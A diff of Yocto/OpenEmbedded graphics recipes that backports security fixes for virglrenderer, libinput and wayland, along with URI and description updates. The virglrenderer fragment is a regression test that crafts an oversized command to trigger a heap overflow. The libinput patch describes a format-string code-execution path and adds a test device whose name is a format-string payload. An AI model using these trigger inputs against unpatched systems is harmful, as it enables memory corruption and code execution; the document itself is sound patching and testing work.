++    virgl_renderer_resource_create(&resource, NULL, 0);
++    virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
++
++    uint32_t size = 0x400;
++    uint32_t cmd[size];
++    int i = 0;
++    cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
++    cmd[i++] = resource.handle;
++    cmd[i++] = 0; // level
++    cmd[i++] = 0; // usage
++    cmd[i++] = 0; // stride
++    cmd[i++] = 0; // layer_stride
++    cmd[i++] = 0; // x
++    cmd[i++] = 0; // y
++    cmd[i++] = 0; // z
++    cmd[i++] = 8; // w
++    cmd[i++] = 4; // h
++    cmd[i++] = 3; // d
++    memset(&cmd[i], 0, size - i);
++
++    virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
++}
++
++
+ int main()
+ {
+    initialize_environment();
+@@ -979,6 +1021,7 @@ int main()
+    test_cs_nullpointer_deference();
+    test_vrend_set_signle_abo_heap_overflow();
+ 
++   test_vrend_3d_resource_overflow();
+ 
+    virgl_renderer_context_destroy(ctx_id);
+    virgl_renderer_cleanup(&cookie);
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
 
 DEPENDS = "libdrm mesa libepoxy"
 SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
-SRC_URI = "git://anongit.freedesktop.org/virglrenderer \
+SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
            file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
            file://0001-meson.build-use-python3-directly-for-python.patch \
+           file://CVE-2022-0135.patch \
            "
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
 
 DEPENDS = "zlib"
 
-SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \
+SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
            file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
            file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
            "
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
 SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
 SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
 
-SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \
-           git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \
-           git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \
+SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
+           git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
+           git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
            file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
            "
 UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
 SUMMARY = "Vulkan Header files and API registry"
+DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
+to modern GPUs with low overhead and targeting realtime graphics applications such as \
+games and interactive media. This package contains the development headers \
+for packages wanting to make use of Vulkan."
 HOMEPAGE = "https://www.khronos.org/vulkan/"
 BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
 SECTION = "libs"
 
 LICENSE = "Apache-2.0"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
 
 SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
 
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
 
 LICENSE = "Apache-2.0"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
 SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
 SUMMARY = "Vulkan Utilities and Tools"
+DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
 HOMEPAGE = "https://www.khronos.org/vulkan/"
 BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
 SECTION = "libs"
 
 LICENSE = "Apache-2.0"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
 SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
-SUMMARY = "cross-platform C library to defer selection of GL API and of window system"
+SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
+DESCRIPTION = "A cross-platform C library that allows one to defer selection \
+of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
+enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
+Wayland with OpenGL ES2, and other window system / API combinations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
                     file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
 
-SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7"
-SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7"
+SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
+SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
+SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
 
-UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html"
+S = "${WORKDIR}/${BPN}-v${PV}"
+
+UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
 
 inherit meson features_check lib_package bash-completion
 
diff --git a/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
new file mode 100644
index 0000000000..313c0c5eb2
--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
+From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Mar 2022 09:25:22 +1000
+Subject: [PATCH] evdev: strip the device name of format directives
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes a format string vulnerabilty.
+
+evdev_log_message() composes a format string consisting of a fixed
+prefix (including the rendered device name) and the passed-in format
+buffer. This format string is then passed with the arguments to the
+actual log handler, which usually and eventually ends up being printf.
+
+If the device name contains a printf-style format directive, these ended
+up in the format string and thus get interpreted correctly, e.g. for a
+device "Foo%sBar" the log message vs printf invocation ends up being:
+  evdev_log_message(device, "some message %s", "some argument");
+  printf("event9 - Foo%sBar: some message %s", "some argument");
+
+This can enable an attacker to execute malicious code with the
+privileges of the process using libinput.
+
+To exploit this, an attacker needs to be able to create a kernel device
+with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
+
+To fix this, convert any potential format directives in the device name
+by duplicating percentages.
+
+Pre-rendering the device to avoid the issue altogether would be nicer
+but the current log level hooks do not easily allow for this. The device
+name is the only user-controlled part of the format string.
+
+A second potential issue is the sysname of the device which is also
+sanitized.
+
+This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
+Assured AB, and independently by Lukas Lamster.
+
+Fixes #752
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
+
+CVE: CVE-2022-1215
+Upstream Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ meson.build                        |  1 +
+ src/evdev.c                        | 31 +++++++++++------
+ src/evdev.h                        |  6 ++--
+ src/util-strings.h                 | 30 ++++++++++++++++
+ test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
+ test/litest.h                      |  1 +
+ test/test-utils.c                  | 26 ++++++++++++++
+ 7 files changed, 139 insertions(+), 12 deletions(-)
+ create mode 100644 test/litest-device-format-string.c
+
+diff --git a/meson.build b/meson.build
+index 90f528e6..1f6159e7 100644
+--- a/meson.build
++++ b/meson.build
+@@ -787,6 +787,7 @@
+ 		'test/litest-device-dell-canvas-totem-touch.c',
+ 		'test/litest-device-elantech-touchpad.c',
+ 		'test/litest-device-elan-tablet.c',
++		'test/litest-device-format-string.c',
+ 		'test/litest-device-generic-singletouch.c',
+ 		'test/litest-device-gpio-keys.c',
+ 		'test/litest-device-huion-pentablet.c',
+diff --git a/src/evdev.c b/src/evdev.c
+index 6d81f58f..d1c35c07 100644
+--- a/src/evdev.c
++++ b/src/evdev.c
+@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
+ 	struct libinput *libinput = seat->libinput;
+ 	struct evdev_device *device = NULL;
+ 	int rc;
+-	int fd;
++	int fd = -1;
+ 	int unhandled_device = 0;
+ 	const char *devnode = udev_device_get_devnode(udev_device);
+-	const char *sysname = udev_device_get_sysname(udev_device);
++	char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
+ 
+ 	if (!devnode) {
+ 		log_info(libinput, "%s: no device node associated\n", sysname);
+-		return NULL;
++		goto err;
+ 	}
+ 
+ 	if (udev_device_should_be_ignored(udev_device)) {
+ 		log_debug(libinput, "%s: device is ignored\n", sysname);
+-		return NULL;
++		goto err;
+ 	}
+ 
+ 	/* Use non-blocking mode so that we can loop on read on
+@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
+ 			 sysname,
+ 			 devnode,
+ 			 strerror(-fd));
+-		return NULL;
++		goto err;
+ 	}
+ 
+ 	if (!evdev_device_have_same_syspath(udev_device, fd))
+ 		goto err;
+ 
+ 	device = zalloc(sizeof *device);
++	device->sysname = sysname;
++	sysname = NULL;
+ 
+ 	libinput_device_init(&device->base, seat);
+ 	libinput_seat_ref(seat);
+@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
+ 	device->dispatch = NULL;
+ 	device->fd = fd;
+ 	device->devname = libevdev_get_name(device->evdev);
++	/* the log_prefix_name is used as part of a printf format string and
++	 * must not contain % directives, see evdev_log_msg */
++	device->log_prefix_name = str_sanitize(device->devname);
+ 	device->scroll.threshold = 5.0; /* Default may be overridden */
+ 	device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
+ 	device->scroll.direction = 0;
+@@ -2238,9 +2238,14 @@
+ 	return device;
+ 
+ err:
+-	close_restricted(libinput, fd);
+-	if (device)
+-		evdev_device_destroy(device);
++	if (fd >= 0) {
++		close_restricted(libinput, fd);
++		if (device) {
++			unhandled_device = device->seat_caps == 0;
++			evdev_device_destroy(device);
++		}
++            }
++        free(sysname);
+ 
+ 	return unhandled_device ? EVDEV_UNHANDLED_DEVICE :  NULL;
+ }
+@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
+ const char *
+ evdev_device_get_sysname(struct evdev_device *device)
+ {
+-	return udev_device_get_sysname(device->udev_device);
++	return device->sysname;
+ }
+ 
+ const char *
+@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
+ 	if (device->base.group)
+ 		libinput_device_group_unref(device->base.group);
+ 
++	free(device->log_prefix_name);
++	free(device->sysname);
+ 	free(device->output_name);
+ 	filter_destroy(device->pointer.filter);
+ 	libinput_timer_destroy(&device->scroll.timer);
+diff --git a/src/evdev.h b/src/evdev.h
+index c7d130f8..980c5943 100644
+--- a/src/evdev.h
++++ b/src/evdev.h
+@@ -169,6 +169,8 @@ struct evdev_device {
+ 	struct udev_device *udev_device;
+ 	char *output_name;
+ 	const char *devname;
++	char *log_prefix_name;
++	char *sysname;
+ 	bool was_removed;
+ 	int fd;
+ 	enum evdev_device_seat_capability seat_caps;
+@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
+ 		 sizeof(buf),
+ 		 "%-7s - %s%s%s",
+ 		 evdev_device_get_sysname(device),
+-		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  device->devname : "",
++		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  device->log_prefix_name : "",
+ 		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  ": " : "",
+ 		 format);
+ 
+@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
+ 		 sizeof(buf),
+ 		 "%-7s - %s%s%s",
+ 		 evdev_device_get_sysname(device),
+-		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  device->devname : "",
++		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  device->log_prefix_name : "",
+ 		 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ?  ": " : "",
+ 		 format);
+ 
+diff --git a/src/util-strings.h b/src/util-strings.h
+index 2a15fab3..d5a84146 100644
+--- a/src/util-strings.h
++++ b/src/util-strings.h
+@@ -42,6 +42,7 @@
+ #ifdef HAVE_XLOCALE_H
+ #include <xlocale.h>
+ #endif
++#include "util-macros.h"
+ 
+ #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
+ #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
+@@ -312,3 +313,31 @@
+ 	free(result);
+ 	return -1;
+ }
++
++/**
++ * Return a copy of str with all % converted to %% to make the string
++ * acceptable as printf format.
++ */
++static inline char *
++str_sanitize(const char *str)
++{
++	if (!str)
++		return NULL;
++
++	if (!strchr(str, '%'))
++		return strdup(str);
++
++	size_t slen = min(strlen(str), 512);
++	char *sanitized = zalloc(2 * slen + 1);
++	const char *src = str;
++	char *dst = sanitized;
++
++	for (size_t i = 0; i < slen; i++) {
++		if (*src == '%')
++			*dst++ = '%';
++		*dst++ = *src++;
++	}
++	*dst = '\0';
++
++	return sanitized;
++}
+diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
+new file mode 100644
+index 00000000..aed15db4
+--- /dev/null
++++ b/test/litest-device-format-string.c
+@@ -0,0 +1,56 @@
++
++/*
++ * Copyright © 2013 Red Hat, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice (including the next
++ * paragraph) shall be included in all copies or substantial portions of the
++ * Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
++ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
++ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
++ * DEALINGS IN THE SOFTWARE.
++ */
++
++#include "config.h"
++
++#include "litest.h"
++#include "litest-int.h"
++
++static struct input_id input_id = {
++	.bustype = 0x3,
++	.vendor = 0x0123,
++	.product = 0x0456,
++};
++
++static int events[] = {
++	EV_KEY, BTN_LEFT,
++	EV_KEY, BTN_RIGHT,
++	EV_KEY, BTN_MIDDLE,
++	EV_REL, REL_X,
++	EV_REL, REL_Y,
++	EV_REL, REL_WHEEL,
++	EV_REL, REL_WHEEL_HI_RES,
++	-1 , -1,
++};
++
++TEST_DEVICE("mouse-format-string",
++	.type = LITEST_MOUSE_FORMAT_STRING,
++	.features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
++	.interface = NULL,
++
++	.name = "Evil %s %d %x Mouse %p %",
++	.id = &input_id,
++	.absinfo = NULL,
++	.events = events,
++)
+diff --git a/test/litest.h b/test/litest.h
+index 4982e516..1b1daa90 100644
+--- a/test/litest.h
++++ b/test/litest.h
+@@ -303,6 +303,7 @@
+ 	LITEST_ALPS_3FG,
+ 	LITEST_ELAN_TABLET,
+ 	LITEST_ABSINFO_OVERRIDE,
++        LITEST_MOUSE_FORMAT_STRING,
+ };
+ 
+ #define LITEST_DEVICELESS	-2
+diff --git a/test/test-utils.c b/test/test-utils.c
+index 989adecd..e80754be 100644
+--- a/test/test-utils.c
++++ b/test/test-utils.c
+@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
+ }
+ END_TEST
+ 
++START_TEST(strsanitize_test)
++{
++	struct strsanitize_test {
++		const char *string;
++		const char *expected;
++	} tests[] = {
++		{ "foobar", "foobar" },
++		{ "", "" },
++		{ "%", "%%" },
++		{ "%%%%", "%%%%%%%%" },
++		{ "x %s", "x %%s" },
++		{ "x %", "x %%" },
++		{ "%sx", "%%sx" },
++		{ "%s%s", "%%s%%s" },
++		{ NULL, NULL },
++	};
++
++	for (struct strsanitize_test *t = tests; t->string; t++) {
++		char *sanitized = str_sanitize(t->string);
++		ck_assert_str_eq(sanitized, t->expected);
++		free(sanitized);
++	}
++}
++END_TEST
++
+ START_TEST(list_test_insert)
+ {
+ 	struct list_test {
+@@ -1138,6 +1138,7 @@
+ 	tcase_add_test(tc, strsplit_test);
+ 	tcase_add_test(tc, kvsplit_double_test);
+ 	tcase_add_test(tc, strjoin_test);
++	tcase_add_test(tc, strsanitize_test);
+ 	tcase_add_test(tc, time_conversion);
+ 
+ 	tcase_add_test(tc, list_test_insert);
+
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/wayland/libinput_1.15.2.bb b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
index 810532774e..d7927d132a 100644
--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
 
 SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
            file://determinism.patch \
+           file://CVE-2022-1215.patch \
            "
 SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
 SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
+From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
+From: Derek Foreman <derek.foreman@collabora.com>
+Date: Fri, 28 Jan 2022 13:18:37 -0600
+Subject: [PATCH] util: Limit size of wl_map
+
+Since server IDs are basically indistinguishable from really big client
+IDs at many points in the source, it's theoretically possible to overflow
+a map and either overflow server IDs into the client ID space, or grow
+client IDs into the server ID space. This would currently take a massive
+amount of RAM, but the definition of massive changes yearly.
+
+Prevent this by placing a ridiculous but arbitrary upper bound on the
+number of items we can put in a map: 0xF00000, somewhere over 15 million.
+This should satisfy pathological clients without restriction, but stays
+well clear of the 0xFF000000 transition point between server and client
+IDs. It will still take an improbable amount of RAM to hit this, and a
+client could still exhaust all RAM in this way, but our goal is to prevent
+overflow and undefined behaviour.
+
+Fixes #224
+
+Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3782
+
+Reference to upstream patch:
+https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
+
+[DP: adjust context for wayland version 1.20.0]
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ src/wayland-private.h |  1 +
+ src/wayland-util.c    | 25 +++++++++++++++++++++++--
+ 2 files changed, 24 insertions(+), 2 deletions(-)
+
+diff --git a/src/wayland-private.h b/src/wayland-private.h
+index 9bf8cb7..35dc40e 100644
+--- a/src/wayland-private.h
++++ b/src/wayland-private.h
+@@ -45,6 +45,7 @@
+ #define WL_MAP_SERVER_SIDE 0
+ #define WL_MAP_CLIENT_SIDE 1
+ #define WL_SERVER_ID_START 0xff000000
++#define WL_MAP_MAX_OBJECTS 0x00f00000
+ #define WL_CLOSURE_MAX_ARGS 20
+ 
+ struct wl_object {
+diff --git a/src/wayland-util.c b/src/wayland-util.c
+index d5973bf..3e45d19 100644
+--- a/src/wayland-util.c
++++ b/src/wayland-util.c
+@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ 	union map_entry *start, *entry;
+ 	struct wl_array *entries;
+ 	uint32_t base;
++	uint32_t count;
+ 
+ 	if (map->side == WL_MAP_CLIENT_SIDE) {
+ 		entries = &map->client_entries;
+@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ 		start = entries->data;
+ 	}
+ 
++	/* wl_array only grows, so if we have too many objects at
++	 * this point there's no way to clean up. We could be more
++	 * pro-active about trying to avoid this allocation, but
++	 * it doesn't really matter because at this point there is
++	 * nothing to be done but disconnect the client and delete
++	 * the whole array either way.
++	 */
++	count = entry - start;
++	if (count > WL_MAP_MAX_OBJECTS) {
++		/* entry->data is freshly malloced garbage, so we'd
++		 * better make it a NULL so wl_map_for_each doesn't
++		 * dereference it later. */
++		entry->data = NULL;
++		return 0;
++	}
+ 	entry->data = data;
+ 	entry->next |= (flags & 0x1) << 1;
+ 
+-	return (entry - start) + base;
++	return count + base;
+ }
+ 
+ int
+@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
+ 		i -= WL_SERVER_ID_START;
+ 	}
+ 
++	if (i > WL_MAP_MAX_OBJECTS)
++		return -1;
++
+ 	count = entries->size / sizeof *start;
+ 	if (count < i)
+ 		return -1;
+@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
+ 		i -= WL_SERVER_ID_START;
+ 	}
+ 
+-	count = entries->size / sizeof *start;
++	if (i > WL_MAP_MAX_OBJECTS)
++		return -1;
+ 
++	count = entries->size / sizeof *start;
+ 	if (count < i)
+ 		return -1;
+ 
+-- 
+2.37.3
diff --git a/meta/recipes-graphics/wayland/wayland_1.18.0.bb b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
index 00be3aac27..e621abddbf 100644
--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
            file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
            file://0001-build-Fix-strndup-detection-on-MinGW.patch \
            file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
+           file://CVE-2021-3782.patch \
            "
 SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
 SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"
diff --git a/meta/recipes-graphics/wayland/weston-init/weston.ini b/meta/recipes-graphics/wayland/weston-init/weston.ini
index 1e6dff68fd..40c5195887 100644
--- a/meta/recipes-graphics/wayland/weston-init/weston.ini
+++ b/meta/recipes-graphics/wayland/weston-init/weston.ini
@@ -42,7 +42,7 @@ require-input=false
 #path=/build/weston-0lEgCh/weston-1.11.0/weston-flower
 
 #[input-method]
-#path=/usr/lib/weston/weston-keyboard
+#path=/usr/libexec/weston-keyboard
 
 #[output]
 #name=LVDS1
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
+From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 20:03:49 +0200
+Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
+ top-level surface
+
+The shsurf is calloc'ed so the surface count is always 0.  Not only
+that but the surface is not set as active by default, so there's no
+need to de-activate it.
+
+Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 442a625f..3791be25 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
+ 	wl_list_init(&shsurf->children_link);
+ 
+ 	weston_desktop_surface_set_user_data(desktop_surface, shsurf);
+-	weston_desktop_surface_set_activated(desktop_surface,
+-					     shsurf->focus_count > 0);
+ }
+ 
+ static void
+-- 
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
+From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:40:22 +0200
+Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
+ activate/de-activate
+
+This way it better reflects that it handles activation rather that input
+focus.
+
+Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
